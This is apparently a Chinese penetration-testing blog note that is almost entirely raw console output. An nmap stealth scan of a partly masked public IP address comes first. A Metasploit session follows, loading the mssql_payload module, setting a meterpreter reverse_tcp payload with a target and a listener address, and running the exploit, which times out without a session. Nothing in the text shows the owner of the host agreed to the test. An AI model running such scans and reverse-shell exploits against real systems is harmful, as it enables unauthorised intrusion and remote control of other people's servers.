滲透雜記-2013-07-13 windows/mssql/mssql_payload

標籤：rect   second   tac   and   exp   時間   one   rank   svd   

掃描一下 Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中國標準時間 NSE: Loaded 49 scripts for scanning. Initiating Ping Scan at 09:36 Scanning 203.171.239.* [4 ports] Completed Ping Scan at 09:36, 0.90s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 09:36 Completed Parallel DNS resolution of 1 host. at 09:36, 0.03s elapsed Initiating SYN Stealth Scan at 09:36 Scanning 203.171.239.* [1000 ports] Discovered open port 3389/tcp on 203.171.239.* Discovered open port 80/tcp on 203.171.239.* Discovered open port 3306/tcp on 203.171.239.* Discovered open port 21/tcp on 203.171.239.* Completed SYN Stealth Scan at 09:36, 33.18s elapsed (1000 total ports) Initiating Service scan at 09:36 Scanning 4 services on 203.171.239.* Completed Service scan at 09:37, 6.07s elapsed (4 services on 1 host) Initiating OS detection (try #1) against 203.171.239.* Retrying OS detection (try #2) against 203.171.239.* Initiating Traceroute at 09:37 Completed Traceroute at 09:37, 0.06s elapsed Initiating Parallel DNS resolution of 1 host. at 09:37 Completed Parallel DNS resolution of 1 host. at 09:37, 0.03s elapsed NSE: Script scanning 203.171.239.*. NSE: Starting runlevel 1 (of 1) scan. Initiating NSE at 09:37 Completed NSE at 09:37, 5.22s elapsed NSE: Script Scanning completed. Nmap scan report for 203.171.239.* Host is up (0.043s latency). Not shown: 994 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 25/tcp closed smtp 80/tcp open http Microsoft IIS httpd |_http-methods: No Allow or Public header in OPTIONS response (status code 400) |_html-title: Site doesn‘t have a title (text/html). 110/tcp closed pop3 3306/tcp open mysql MySQL 5.1.32-community | mysql-info: Protocol: 10 | Version: 5.1.32-community | Thread ID: 30457 | Some Capabilities: Long Passwords, Connect with DB, Compress, ODBC, Transactions, Secure Connection | Status: Autocommit |_Salt: <*[k+0O~O" target=_blank>[email protected]";By^J5k<*[k+0O~O 3389/tcp open microsoft-rdp Microsoft Terminal Service Device type: general purpose|media device Running (JUST GUESSING) : Microsoft Windows 2003|XP (93%), Motorola Windows PocketPC/CE (85%) Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows Server 2003 SP1 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows XP Professional SP3 (85%), Microsoft Windows XP SP2 (85%), Microsoft Windows XP SP3 (85%), Motorola VIP1216 digital set top box (Windows CE 5.0) (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop TCP Sequence Prediction: Difficulty=262 (Good luck!) IP ID Sequence Generation: Busy server or unknown class Service Info: OS: Windows TRACEROUTE (using port 25/tcp) HOP RTT ADDRESS 1 50.00 ms 203.171.239.* Read data files from: D:\metasploit\Nmap OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 54.32 seconds Raw packets sent: 2095 (95.768KB) | Rcvd: 251 (223.649KB) 開始拿站 Welcome to the Metasploit Web Console! _ _ _ | | (_)_ ____ ____| |_ ____ ___ ____ | | ___ _| |_ | \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _) | | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__ |_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___) |_| =[ metasploit v3.4.2-dev [core:3.4 api:1.0] + -- --=[ 566 exploits - 283 auxiliary + -- --=[ 210 payloads - 27 encoders - 8 nops =[ svn r9834 updated 296 days ago (2010.07.14) Warning: This copy of the Metasploit Framework was last updated 296 days ago. We recommend that you update the framework at least every other day. For information on updating your copy of Metasploit, please see: http://www.metasploit.com/redmine/projects/framework/wiki/Updating >> use windows/mssql/mssql_payload >> info windows/mssql/mssql_payload Name: Microsoft SQL Server Payload Execution Version: 9669 Platform: Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Provided by: David Kennedy "ReL1K" <kennedyd013@gmail.com> jduck <jduck@metasploit.com> Available targets: Id Name -- ---- 0 Automatic Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username RHOST yes The target address RPORT 1433 yes The target port USERNAME sa no The username to authenticate as UseCmdStager true no Wait for user input before returning from exploit VERBOSE false no Enable verbose output Payload information: Description: This module will execute an arbitrary payload on a Microsoft SQL Server, using the Windows debug.com method for writing an executable to disk and the xp_cmdshell stored procedure. File size restrictions are avoided by incorporating the debug bypass method presented at Defcon 17 by SecureState. Note that this module will leave a metasploit payload in the Windows System32 directory which must be manually deleted once the attack is completed. References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0402 http://www.osvdb.org/557 http://www.securityfocus.com/bid/1281 http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-1209 http://www.osvdb.org/15757 http://www.securityfocus.com/bid/4797 http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf >> use windows/mssql/mssql_payload >> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp >> show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username RHOST yes The target address RPORT 1433 yes The target port USERNAME sa no The username to authenticate as UseCmdStager true no Wait for user input before returning from exploit VERBOSE false no Enable verbose output Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic >> set RHOST 203.171.239.* RHOST => 203.171.239.* >> set LHOST 172.16.2.101 LHOST => 172.16.2.101 >> exploit [*] Started reverse handler on 172.16.2.101:4444 [-] Exploit failed: The connection timed out (203.171.239.*:1433). [*] Exploit completed, but no session was created.

滲透雜記-2013-07-13 windows/mssql/mssql_payload